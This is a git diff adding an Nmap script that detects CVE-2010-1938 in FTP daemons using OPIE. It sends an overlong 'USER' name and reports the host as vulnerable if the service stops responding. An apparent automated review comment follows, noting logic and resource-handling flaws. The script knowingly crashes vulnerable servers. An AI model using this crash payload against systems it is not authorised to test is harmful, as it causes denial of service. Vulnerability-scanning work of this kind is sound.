diff --git a/CHANGELOG b/CHANGELOG
index ee104d2c4..3ad7a2f48 100644
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,5 +1,11 @@
 # Nmap Changelog ($Id$); -*-text-*-
+o [NSE] Added ftp-libopie.nse by Gutek. This script checks for an
+ off-by-one stack overflow vulnerability in libopie by giving the FTP
+ service an overlong name. See
+ http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc for
+ details.
+
 o Fixed name resolution in environments where gethostbyname can return IPv6 (or other non-IPv4 addresses). In such an environment, Nmap would wrongly use the first four bytes of the IPv6 address as an
diff --git a/scripts/ftp-libopie.nse b/scripts/ftp-libopie.nse
new file mode 100644
index 000000000..da1ba405e
--- /dev/null
+++ b/scripts/ftp-libopie.nse
@@ -0,0 +1,62 @@
+description = [[
+Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
+Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki.
+See also http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc.
+Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
+]]
+
+---
+-- @output
+-- PORT STATE SERVICE
+-- 21/tcp open ftp
+-- | ftp-libopie: Warning: Looks like the service has crashed!
+-- | Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
+-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
+
+
+author = "Ange Gutek"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln","intrusive"}
+
+require "shortport"
+
+portrule = shortport.port_or_service(21, "ftp")
+
+action = function(host, port)
+ local socket = nmap.new_socket()
+ local result
+ -- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory).
+ local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+ local status = true
+
+ local err_catch = function()
+ socket:close()
+ end
+
+ local try = nmap.new_try(err_catch)
+
+ socket:set_timeout(10000)
+ try(socket:connect(host.ip, port.number, port.protocol))
+
+ -- First, try a safe User so that we are sure that everything is ok
+ local payload = "USER opie\r\n"
+ try(socket:send(payload))
+
+ status, result = socket:receive_lines(1);
+ if status and not (string.match(result,"^421")) then
+
+ -- Second, try the vulnerable user account
+ local payload = "USER " .. user_account .. "\r\n"
+ try(socket:send(payload))
+
+ status, result = socket:receive_lines(1);
+ if status then
+ return
+ else
+ -- if the server does not answer anymore we may have reached a stack overflow condition
+ return "Warning: Looks like the service has crashed!\nLikely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
+ end
+ else
+ return
+ end
+end
diff --git a/scripts/script.db b/scripts/script.db
index dfd891729..12f5e3c8e 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -30,6 +30,7 @@ Entry { filename = "finger.nse", categories = { "default", "discovery", "safe",
 Entry { filename = "ftp-anon.nse", categories = { "auth", "default", "safe", } }
 Entry { filename = "ftp-bounce.nse", categories = { "default", "intrusive", } }
 Entry { filename = "ftp-brute.nse", categories = { "auth", "intrusive", } }
+Entry { filename = "ftp-libopie.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "html-title.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "http-auth.nse", categories = { "auth", "default", "intrusive", } }
 Entry { filename = "http-date.nse", categories = { "discovery", "safe", } }
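Review bot: The FTP greeting is never consumed in `action`: after `try(socket:connect(...))` the script sends `USER opie` and then reads one line, so that read returns the `220` banner rather than the reply to the USER, and the second `receive_lines(1)` can be satisfied by the still-buffered reply to the first USER even if the overlong name has already taken the daemon down, which yields a false negative. Read the greeting right after connect (`status, result = socket:receive_lines(1)`) and apply the `^421` check to it, so that each later `receive_lines(1)` pairs with the command just sent; a multi-line `220-` greeting may still need more than one line, so that should be handled too. The crash verdict also treats any failed receive as a crash, so the error string left in `result` on failure should be inspected to distinguish a closed connection from the 10 s timeout set by `socket:set_timeout(10000)`, otherwise a slow server is reported as vulnerable. Both plain `return` paths leave the socket open, since `socket:close()` only runs inside `err_catch`; add `socket:close()` before each return.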